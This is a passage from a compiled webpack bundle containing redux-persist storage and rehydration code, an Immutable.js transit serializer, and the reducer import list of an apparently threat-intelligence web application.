    transforms = [].concat(_toConsumableArray(incomingTransforms), [(0, _reduxPersistTransformImmutable2.default)({ records: records })]);
  }
  return _extends({ stateReconciler: _reconciler.stateReconciler }, config, operators, { transforms: transforms });
};

var autoRehydrate = function autoRehydrate() {
  for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    args[_key - 1] = arguments[_key];
  }

  var config = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};

  return _reduxPersist.autoRehydrate.apply(undefined, [extendConfig(config)].concat(args));
};

var createPersistor = function createPersistor(store) {
  for (var _len2 = arguments.length, args = Array(_len2 > 2 ? _len2 - 2 : 0), _key2 = 2; _key2 < _len2; _key2++) {
    args[_key2 - 2] = arguments[_key2];
  }

  var config = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {};

  return _reduxPersist.createPersistor.apply(undefined, [store, extendConfig(config)].concat(args));
};

var persistStore = function persistStore(store) {
  for (var _len3 = arguments.length, args = Array(_len3 > 2 ? _len3 - 2 : 0), _key3 = 2; _key3 < _len3; _key3++) {
    args[_key3 - 2] = arguments[_key3];
  }

  var config = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {};

  return _reduxPersist.persistStore.apply(undefined, [store, extendConfig(config)].concat(args));
};

var getStoredState = function getStoredState() {
  for (var _len4 = arguments.length, args = Array(_len4 > 1 ? _len4 - 1 : 0), _key4 = 1; _key4 < _len4; _key4++) {
    args[_key4 - 1] = arguments[_key4];
  }

  var config = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};

  return _reduxPersist.getStoredState.apply(undefined, [extendConfig(config)].concat(args));
};

exports.autoRehydrate = autoRehydrate;
exports.createPersistor = createPersistor;
exports.createTransform = _reduxPersist.createTransform;
exports.getStoredState = getStoredState;
exports.persistStore = persistStore;
exports.purgeStoredState = _reduxPersist.purgeStoredState;

/***/ }),
/* 967 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "storages", function() { return storages; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__autoRehydrate__ = __webpack_require__(1928);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__createPersistor__ = __webpack_require__(971);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__createTransform__ = __webpack_require__(1933);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__getStoredState__ = __webpack_require__(975);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__persistStore__ = __webpack_require__(1934);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__purgeStoredState__ = __webpack_require__(974);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "autoRehydrate", function() { return __WEBPACK_IMPORTED_MODULE_0__autoRehydrate__["a"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "createPersistor", function() { return __WEBPACK_IMPORTED_MODULE_1__createPersistor__["a"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "createTransform", function() { return __WEBPACK_IMPORTED_MODULE_2__createTransform__["a"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "getStoredState", function() { return __WEBPACK_IMPORTED_MODULE_3__getStoredState__["a"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "persistStore", function() { return __WEBPACK_IMPORTED_MODULE_4__persistStore__["a"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "purgeStoredState", function() { return __WEBPACK_IMPORTED_MODULE_5__purgeStoredState__["a"]; });







// @TODO remove in v5
var deprecated = function deprecated(cb, cb2, cb3) {
  console.error('redux-persist: this method of importing storages has been removed. instead use `import { asyncLocalStorage } from "redux-persist/storages"`');
  if (typeof cb === 'function') cb();
  if (typeof cb2 === 'function') cb2();
  if (typeof cb3 === 'function') cb3();
};
var deprecatedStorage = { getAllKeys: deprecated, getItem: deprecated, setItem: deprecated, removeItem: deprecated };
var storages = {
  asyncLocalStorage: deprecatedStorage,
  asyncSessionStorage: deprecatedStorage
};



/***/ }),
/* 968 */,
/* 969 */,
/* 970 */,
/* 971 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = createPersistor;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__constants__ = __webpack_require__(262);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__defaults_asyncLocalStorage__ = __webpack_require__(972);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__purgeStoredState__ = __webpack_require__(974);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_json_stringify_safe__ = __webpack_require__(1932);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_json_stringify_safe___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_json_stringify_safe__);





function createPersistor(store, config) {
  // defaults
  var serializer = config.serialize === false ? function (data) {
    return data;
  } : defaultSerializer;
  var deserializer = config.serialize === false ? function (data) {
    return data;
  } : defaultDeserializer;
  var blacklist = config.blacklist || [];
  var whitelist = config.whitelist || false;
  var transforms = config.transforms || [];
  var debounce = config.debounce || false;
  var keyPrefix = config.keyPrefix !== undefined ? config.keyPrefix : __WEBPACK_IMPORTED_MODULE_0__constants__["KEY_PREFIX"];

  // pluggable state shape (e.g. immutablejs)
  var stateInit = config._stateInit || {};
  var stateIterator = config._stateIterator || defaultStateIterator;
  var stateGetter = config._stateGetter || defaultStateGetter;
  var stateSetter = config._stateSetter || defaultStateSetter;

  // storage with keys -> getAllKeys for localForage support
  var storage = config.storage || Object(__WEBPACK_IMPORTED_MODULE_1__defaults_asyncLocalStorage__["a" /* default */])('local');
  if (storage.keys && !storage.getAllKeys) {
    storage.getAllKeys = storage.keys;
  }

  // initialize stateful values
  var lastState = stateInit;
  var paused = false;
  var storesToProcess = [];
  var timeIterator = null;

  store.subscribe(function () {
    if (paused) return;

    var state = store.getState();

    stateIterator(state, function (subState, key) {
      if (!passWhitelistBlacklist(key)) return;
      if (stateGetter(lastState, key) === stateGetter(state, key)) return;
      if (storesToProcess.indexOf(key) !== -1) return;
      storesToProcess.push(key);
    });

    var len = storesToProcess.length;

    // time iterator (read: debounce)
    if (timeIterator === null) {
      timeIterator = setInterval(function () {
        if (paused && len === storesToProcess.length || storesToProcess.length === 0) {
          clearInterval(timeIterator);
          timeIterator = null;
          return;
        }

        var key = storesToProcess.shift();
        var storageKey = createStorageKey(key);
        var endState = transforms.reduce(function (subState, transformer) {
          return transformer.in(subState, key);
        }, stateGetter(store.getState(), key));
        if (typeof endState !== 'undefined') storage.setItem(storageKey, serializer(endState), warnIfSetError(key));
      }, debounce);
    }

    lastState = state;
  });

  function passWhitelistBlacklist(key) {
    if (whitelist && whitelist.indexOf(key) === -1) return false;
    if (blacklist.indexOf(key) !== -1) return false;
    return true;
  }

  function adhocRehydrate(incoming) {
    var options = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {};

    var state = {};
    if (options.serial) {
      stateIterator(incoming, function (subState, key) {
        try {
          var data = deserializer(subState);
          var value = transforms.reduceRight(function (interState, transformer) {
            return transformer.out(interState, key);
          }, data);
          state = stateSetter(state, key, value);
        } catch (err) {
          if (false) console.warn('Error rehydrating data for key "' + key + '"', subState, err);
        }
      });
    } else state = incoming;

    store.dispatch(rehydrateAction(state));
    return state;
  }

  function createStorageKey(key) {
    return '' + keyPrefix + key;
  }

  // return `persistor`
  return {
    rehydrate: adhocRehydrate,
    pause: function pause() {
      paused = true;
    },
    resume: function resume() {
      paused = false;
    },
    purge: function purge(keys) {
      return Object(__WEBPACK_IMPORTED_MODULE_2__purgeStoredState__["a" /* default */])({ storage: storage, keyPrefix: keyPrefix }, keys);
    }
  };
}

function warnIfSetError(key) {
  return function setError(err) {
    if (err && "production" !== 'production') {
      console.warn('Error storing data for key:', key, err);
    }
  };
}

function defaultSerializer(data) {
  return __WEBPACK_IMPORTED_MODULE_3_json_stringify_safe___default()(data, null, null, function (k, v) {
    if (false) return null;
    throw new Error('\n      redux-persist: cannot process cyclical state.\n      Consider changing your state structure to have no cycles.\n      Alternatively blacklist the corresponding reducer key.\n      Cycle encounted at key "' + k + '" with value "' + v + '".\n    ');
  });
}

function defaultDeserializer(serial) {
  return JSON.parse(serial);
}

function rehydrateAction(data) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__constants__["REHYDRATE"],
    payload: data
  };
}

function defaultStateIterator(collection, callback) {
  return Object.keys(collection).forEach(function (key) {
    return callback(collection[key], key);
  });
}

function defaultStateGetter(state, key) {
  return state[key];
}

function defaultStateSetter(state, key, value) {
  state[key] = value;
  return state;
}

/***/ }),
/* 972 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_setImmediate__ = __webpack_require__(973);
var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; };



var noStorage = function noStorage() {
  /* noop */return null;
};
if (false) {
  noStorage = function noStorage() {
    console.error('redux-persist asyncLocalStorage requires a global localStorage object. Either use a different storage backend or if this is a universal redux application you probably should conditionally persist like so: https://gist.github.com/rt2zz/ac9eb396793f95ff3c3b');
    return null;
  };
}

function _hasStorage(storageType) {
  if ((typeof window === 'undefined' ? 'undefined' : _typeof(window)) !== 'object' || !(storageType in window)) {
    return false;
  }

  try {
    var storage = window[storageType];
    var testKey = 'redux-persist ' + storageType + ' test';
    storage.setItem(testKey, 'test');
    storage.getItem(testKey);
    storage.removeItem(testKey);
  } catch (e) {
    if (false) console.warn('redux-persist ' + storageType + ' test failed, persistence will be disabled.');
    return false;
  }
  return true;
}

function hasLocalStorage() {
  return _hasStorage('localStorage');
}

function hasSessionStorage() {
  return _hasStorage('sessionStorage');
}

function getStorage(type) {
  if (type === 'local') {
    return hasLocalStorage() ? window.localStorage : { getItem: noStorage, setItem: noStorage, removeItem: noStorage, getAllKeys: noStorage };
  }
  if (type === 'session') {
    return hasSessionStorage() ? window.sessionStorage : { getItem: noStorage, setItem: noStorage, removeItem: noStorage, getAllKeys: noStorage };
  }
}

/* harmony default export */ __webpack_exports__["a"] = (function (type, config) {
  var storage = getStorage(type);
  return {
    getAllKeys: function getAllKeys(cb) {
      return new Promise(function (resolve, reject) {
        try {
          var keys = [];
          for (var i = 0; i < storage.length; i++) {
            keys.push(storage.key(i));
          }
          Object(__WEBPACK_IMPORTED_MODULE_0__utils_setImmediate__["a" /* default */])(function () {
            cb && cb(null, keys);
            resolve(keys);
          });
        } catch (e) {
          cb && cb(e);
          reject(e);
        }
      });
    },
    getItem: function getItem(key, cb) {
      return new Promise(function (resolve, reject) {
        try {
          var s = storage.getItem(key);
          Object(__WEBPACK_IMPORTED_MODULE_0__utils_setImmediate__["a" /* default */])(function () {
            cb && cb(null, s);
            resolve(s);
          });
        } catch (e) {
          cb && cb(e);
          reject(e);
        }
      });
    },
    setItem: function setItem(key, string, cb) {
      return new Promise(function (resolve, reject) {
        try {
          storage.setItem(key, string);
          Object(__WEBPACK_IMPORTED_MODULE_0__utils_setImmediate__["a" /* default */])(function () {
            cb && cb(null);
            resolve();
          });
        } catch (e) {
          cb && cb(e);
          reject(e);
        }
      });
    },
    removeItem: function removeItem(key, cb) {
      return new Promise(function (resolve, reject) {
        try {
          storage.removeItem(key);
          Object(__WEBPACK_IMPORTED_MODULE_0__utils_setImmediate__["a" /* default */])(function () {
            cb && cb(null);
            resolve();
          });
        } catch (e) {
          cb && cb(e);
          reject(e);
        }
      });
    }
  };
});

/***/ }),
/* 973 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* WEBPACK VAR INJECTION */(function(global) {var hasNativeSupport = typeof global !== 'undefined' && typeof global.setImmediate !== 'undefined';
var setImmediate = hasNativeSupport ? function (fn, ms) {
  return global.setImmediate(fn, ms);
} : function (fn, ms) {
  return setTimeout(fn, ms);
};

/* harmony default export */ __webpack_exports__["a"] = (setImmediate);
/* WEBPACK VAR INJECTION */}.call(__webpack_exports__, __webpack_require__(17)))

/***/ }),
/* 974 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = purgeStoredState;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__constants__ = __webpack_require__(262);


function purgeStoredState(config, keys) {
  var storage = config.storage;
  var keyPrefix = config.keyPrefix !== undefined ? config.keyPrefix : __WEBPACK_IMPORTED_MODULE_0__constants__["KEY_PREFIX"];

  // basic validation
  if (Array.isArray(config)) throw new Error('redux-persist: purgeStoredState requires config as a first argument (found array). An array of keys is the optional second argument.');
  if (!storage) throw new Error('redux-persist: config.storage required in purgeStoredState');

  if (typeof keys === 'undefined') {
    // if keys is not defined, purge all keys
    return new Promise(function (resolve, reject) {
      storage.getAllKeys(function (err, allKeys) {
        if (err) {
          if (false) console.warn('redux-persist: error during purgeStoredState in storage.getAllKeys');
          reject(err);
        } else {
          resolve(purgeStoredState(config, allKeys.filter(function (key) {
            return key.indexOf(keyPrefix) === 0;
          }).map(function (key) {
            return key.slice(keyPrefix.length);
          })));
        }
      });
    });
  } else {
    // otherwise purge specified keys
    return Promise.all(keys.map(function (key) {
      return storage.removeItem('' + keyPrefix + key, warnIfRemoveError(key));
    }));
  }
}

function warnIfRemoveError(key) {
  return function removeError(err) {
    if (err && "production" !== 'production') {
      console.warn('Error storing data for key:', key, err);
    }
  };
}

/***/ }),
/* 975 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = getStoredState;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__constants__ = __webpack_require__(262);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__defaults_asyncLocalStorage__ = __webpack_require__(972);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };




function getStoredState(config, onComplete) {
  var storage = config.storage || Object(__WEBPACK_IMPORTED_MODULE_1__defaults_asyncLocalStorage__["a" /* default */])('local');
  var deserializer = config.serialize === false ? function (data) {
    return data;
  } : defaultDeserializer;
  var blacklist = config.blacklist || [];
  var whitelist = config.whitelist || false;
  var transforms = config.transforms || [];
  var keyPrefix = config.keyPrefix !== undefined ? config.keyPrefix : __WEBPACK_IMPORTED_MODULE_0__constants__["KEY_PREFIX"];

  // fallback getAllKeys to `keys` if present (LocalForage compatability)
  if (storage.keys && !storage.getAllKeys) storage = _extends({}, storage, { getAllKeys: storage.keys });

  var restoredState = {};
  var completionCount = 0;

  storage.getAllKeys(function (err, allKeys) {
    if (err) {
      if (false) console.warn('redux-persist/getStoredState: Error in storage.getAllKeys');
      complete(err);
    }

    var persistKeys = allKeys.filter(function (key) {
      return key.indexOf(keyPrefix) === 0;
    }).map(function (key) {
      return key.slice(keyPrefix.length);
    });
    var keysToRestore = persistKeys.filter(passWhitelistBlacklist);

    var restoreCount = keysToRestore.length;
    if (restoreCount === 0) complete(null, restoredState);
    keysToRestore.forEach(function (key) {
      storage.getItem(createStorageKey(key), function (err, serialized) {
        if (err && "production" !== 'production') console.warn('redux-persist/getStoredState: Error restoring data for key:', key, err);else restoredState[key] = rehydrate(key, serialized);
        completionCount += 1;
        if (completionCount === restoreCount) complete(null, restoredState);
      });
    });
  });

  function rehydrate(key, serialized) {
    var state = null;

    try {
      var data = deserializer(serialized);
      state = transforms.reduceRight(function (subState, transformer) {
        return transformer.out(subState, key);
      }, data);
    } catch (err) {
      if (false) console.warn('redux-persist/getStoredState: Error restoring data for key:', key, err);
    }

    return state;
  }

  function complete(err, restoredState) {
    onComplete(err, restoredState);
  }

  function passWhitelistBlacklist(key) {
    if (whitelist && whitelist.indexOf(key) === -1) return false;
    if (blacklist.indexOf(key) !== -1) return false;
    return true;
  }

  function createStorageKey(key) {
    return '' + keyPrefix + key;
  }

  if (typeof onComplete !== 'function' && !!Promise) {
    return new Promise(function (resolve, reject) {
      onComplete = function onComplete(err, restoredState) {
        if (err) reject(err);else resolve(restoredState);
      };
    });
  }
}

function defaultDeserializer(serial) {
  return JSON.parse(serial);
}

/***/ }),
/* 976 */
/***/ (function(module, exports, __webpack_require__) {

var transit = __webpack_require__(977);
var Immutable = __webpack_require__(1);

function createReader(handlers) {
  return transit.reader('json', {
    mapBuilder: {
      init: function() {
        return {};
      },
      add: function(m, k, v) {
        m[k] = v;
        return m;
      },
      finalize: function(m) {
        return m;
      }
    },
    handlers: handlers
  });
}

function createReaderHandlers(extras, recordMap, missingRecordHandler) {
  var handlers = {
    iM: function(v) {
      var m = Immutable.Map().asMutable();
      for (var i = 0; i < v.length; i += 2) {
        m = m.set(v[i], v[i + 1]);
      }
      return m.asImmutable();
    },
    iOM: function(v) {
      var m = Immutable.OrderedMap().asMutable();
      for (var i = 0; i < v.length; i += 2) {
        m = m.set(v[i], v[i + 1]);
      }
      return m.asImmutable();
    },
    iL: function(v) {
      return Immutable.List(v);
    },
    iS: function(v) {
      return Immutable.Set(v);
    },
    iOS: function(v) {
      return Immutable.OrderedSet(v);
    },
    iR: function(v) {
      var RecordType = recordMap[v.n];
      if (!RecordType) {
        return missingRecordHandler(v.n, v.v);
      }

      return new RecordType(v.v);
    }
  };
  extras.forEach(function(extra) {
    handlers[extra.tag] = extra.read;
  });
  return handlers;
}

function createWriter(handlers) {
  return transit.writer('json', {
    handlers: handlers
  });
}

function createWriterHandlers(extras, recordMap, predicate) {
  function mapSerializer(m) {
    var i = 0;
    if (predicate) {
      m = m.filter(predicate);
    }
    var a = new Array(2 * m.size);
    m.forEach(function(v, k) {
      a[i++] = k;
      a[i++] = v;
    });
    return a;
  }

  var handlers = transit.map([
    Immutable.Map, transit.makeWriteHandler({
      tag: function() {
        return 'iM';
      },
      rep: mapSerializer
    }),
    Immutable.OrderedMap, transit.makeWriteHandler({
      tag: function() {
        return 'iOM';
      },
      rep: mapSerializer
    }),
    Immutable.List, transit.makeWriteHandler({
      tag: function() {
        return "iL";
      },
      rep: function(v) {
        if (predicate) {
          v = v.filter(predicate);
        }
        return v.toArray();
      }
    }),
    Immutable.Set, transit.makeWriteHandler({
      tag: function() {
        return "iS";
      },
      rep: function(v) {
        if (predicate) {
          v = v.filter(predicate);
        }
        return v.toArray();
      }
    }),
    Immutable.OrderedSet, transit.makeWriteHandler({
      tag: function() {
        return "iOS";
      },
      rep: function(v) {
        if (predicate) {
          v = v.filter(predicate);
        }
        return v.toArray();
      }
    }),
    Function, transit.makeWriteHandler({
      tag: function() {
        return '_';
      },
      rep: function() {
        return null;
      }
    }),
    "default", transit.makeWriteHandler({
      tag: function() {
        return 'iM';
      },
      rep: function(m) {
        if (!('toMap' in m)) {
          var e = "Error serializing unrecognized object " + m.toString();
          throw new Error(e);
        }
        return mapSerializer(m.toMap());
      }
    })
  ]);

  Object.keys(recordMap).forEach(function(name) {
    handlers.set(recordMap[name], makeRecordHandler(name, predicate));
  });

  extras.forEach(function(extra) {
    handlers.set(extra.class, transit.makeWriteHandler({
      tag: function() { return extra.tag; },
      rep: extra.write
    }));
  });

  return handlers;
}

function validateExtras(extras) {
  if (!Array.isArray(extras)) {
    invalidExtras(extras, "Expected array of handlers, got %j");
  }
  extras.forEach(function(extra) {
    if (typeof extra.tag !== "string") {
      invalidExtras(extra,
        "Expected %j to have property 'tag' which is a string");
    }
    if (typeof extra.class !== "function") {
      invalidExtras(extra,
        "Expected %j to have property 'class' which is a constructor function");
    }
    if (typeof extra.write !== "function") {
      invalidExtras(extra,
        "Expected %j to have property 'write' which is a function");
    }
    if (typeof extra.read !== "function") {
      invalidExtras(extra,
        "Expected %j to have property 'write' which is a function");
    }
  });
}
function invalidExtras(data, msg) {
  var json = JSON.stringify(data);
  throw new Error(msg.replace("%j", json));
}

function recordName(record) {
  /* eslint no-underscore-dangle: 0 */
  return record._name || record.constructor.name || 'Record';
}

function makeRecordHandler(name) {
  return transit.makeWriteHandler({
    tag: function() {
      return 'iR';
    },
    rep: function(m) {
      return {
        n: name,
        v: m.toObject()
      };
    }
  });
}

function buildRecordMap(recordClasses) {
  var recordMap = {};

  recordClasses.forEach(function(RecordType) {
    var rec = new RecordType({});
    var recName = recordName(rec);

    if (!recName || recName === 'Record') {
      throw new Error('Cannot (de)serialize Record() without a name');
    }

    if (recordMap[recName]) {
      throw new Error('There\'s already a constructor for a Record named ' +
                      recName);
    }
    recordMap[recName] = RecordType;
  });

  return recordMap;
}

function defaultMissingRecordHandler(recName) {
  var msg = 'Tried to deserialize Record type named `' + recName + '`, ' +
            'but no type with that name was passed to withRecords()';
  throw new Error(msg);
}

function createInstanceFromHandlers(handlers) {
  var reader = createReader(handlers.read);
  var writer = createWriter(handlers.write);

  return {
    toJSON: function toJSON(data) {
      return writer.write(data);
    },
    fromJSON: function fromJSON(json) {
      return reader.read(json);
    },
    withExtraHandlers: function(extra) {
      return createInstanceFromHandlers(handlers.withExtraHandlers(extra));
    },
    withFilter: function(predicate) {
      return createInstanceFromHandlers(handlers.withFilter(predicate));
    },
    withRecords: function(recordClasses, missingRecordHandler) {
      return createInstanceFromHandlers(
        handlers.withRecords(recordClasses, missingRecordHandler)
      );
    }
  };
}

function createHandlers(options) {
  var records = options.records || {};
  var filter = options.filter || false;
  var missingRecordFn = options.missingRecordHandler
                          || defaultMissingRecordHandler;
  var extras = options.extras || [];

  return {
    read: createReaderHandlers(extras, records, missingRecordFn),
    write: createWriterHandlers(extras, records, filter),
    withExtraHandlers: function(moreExtras) {
      validateExtras(moreExtras);

      return createHandlers({
        extras: extras.concat(moreExtras),
        records: records,
        filter: filter,
        missingRecordHandler: missingRecordFn
      });
    },
    withFilter: function(newFilter) {
      return createHandlers({
        extras: extras,
        records: records,
        filter: newFilter,
        missingRecordHandler: missingRecordFn
      });
    },
    withRecords: function(recordClasses, missingRecordHandler) {
      var recordMap = buildRecordMap(recordClasses);
      return createHandlers({
        extras: extras,
        records: recordMap,
        filter: filter,
        missingRecordHandler: missingRecordHandler
      });
    }
  };
}

module.exports = createInstanceFromHandlers(createHandlers({}));
module.exports.handlers = createHandlers({});


/***/ }),
/* 977 */,
/* 978 */,
/* 979 */,
/* 980 */,
/* 981 */,
/* 982 */,
/* 983 */,
/* 984 */,
/* 985 */,
/* 986 */,
/* 987 */,
/* 988 */,
/* 989 */,
/* 990 */,
/* 991 */,
/* 992 */,
/* 993 */,
/* 994 */,
/* 995 */,
/* 996 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return rootEpic; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return rootReducer; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return rootSerializer; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils_redux_utils__ = __webpack_require__(568);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_redux_form_immutable__ = __webpack_require__(180);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_redux_form_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_redux_form_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_app__ = __webpack_require__(179);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_alerts__ = __webpack_require__(400);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_chat__ = __webpack_require__(1296);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_modules_companies__ = __webpack_require__(402);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_create__ = __webpack_require__(884);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_data_feeds__ = __webpack_require__(298);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_devtasks__ = __webpack_require__(901);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_enclave__ = __webpack_require__(296);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_modules_enclave_management__ = __webpack_require__(887);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_icons__ = __webpack_require__(1310);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_modules_miscellaneous__ = __webpack_require__(888);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16_modules_templates__ = __webpack_require__(885);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17_modules_subscription_management__ = __webpack_require__(564);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18_modules_subscriptions__ = __webpack_require__(407);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_19_modules_groups__ = __webpack_require__(889);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_20__insights__ = __webpack_require__(572);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_21_modules_marketplace__ = __webpack_require__(902);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_22_modules_malware__ = __webpack_require__(903);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_23_modules_threat_actors__ = __webpack_require__(904);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_24_modules_metrics__ = __webpack_require__(1327);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_25_modules_profile__ = __webpack_require__(140);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_26_modules_redaction__ = __webpack_require__(890);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_27_modules_reports__ = __webpack_require__(558);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_28_modules_summaries__ = __webpack_require__(1631);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_29_modules_entity_scores__ = __webpack_require__(1647);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_30_modules_errors__ = __webpack_require__(906);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_31_modules_display__ = __webpack_require__(883);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_32_modules_roles__ = __webpack_require__(897);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_33_modules_sectors__ = __webpack_require__(566);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_34_modules_settings__ = __webpack_require__(567);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_35_modules_users__ = __webpack_require__(881);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_36_modules_indicators__ = __webpack_require__(560);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_37_modules_global_whitelist__ = __webpack_require__(907);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_38_modules_company_whitelist__ = __webpack_require__(562);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_39_modules_search__ = __webpack_require__(253);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_40_modules_tags__ = __webpack_require__(878);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_41_modules_triage__ = __webpack_require__(1649);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_42_modules_notificationPreferences__ = __webpack_require__(1640);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_43_modules_router_epics_js__ = __webpack_require__(3434);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_44_modules_analysis__ = __webpack_require__(565);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_45_modules_constellation__ = __webpack_require__(403);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_46_modules_tracking__ = __webpack_require__(3440);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_47_modules_features__ = __webpack_require__(181);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_48_modules_app_stores_js__ = __webpack_require__(1294);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_49_modules_enclave_stores_js__ = __webpack_require__(1309);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_50_modules_profile_stores_js__ = __webpack_require__(1305);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_51_modules_settings_stores_js__ = __webpack_require__(1433);


 // from npm module



/* Store and Epic Imports */








































/* These moduels are still oddballs because they both export two store reducers...
 * We will resolve this later. Should just be a matter of updating getters */





/* Epics:
 *
 * NOTE: We give these a name key so the error wrapper which is applied by createRootEpic
 * can report the offending epic for error reporting if an uncaught error propagation occurs
 * in production. Some of these stacktraces previously have not contained enough information
 * to diagnose the error source. Providing the name should help with this.
 *
 ================================================================================= */
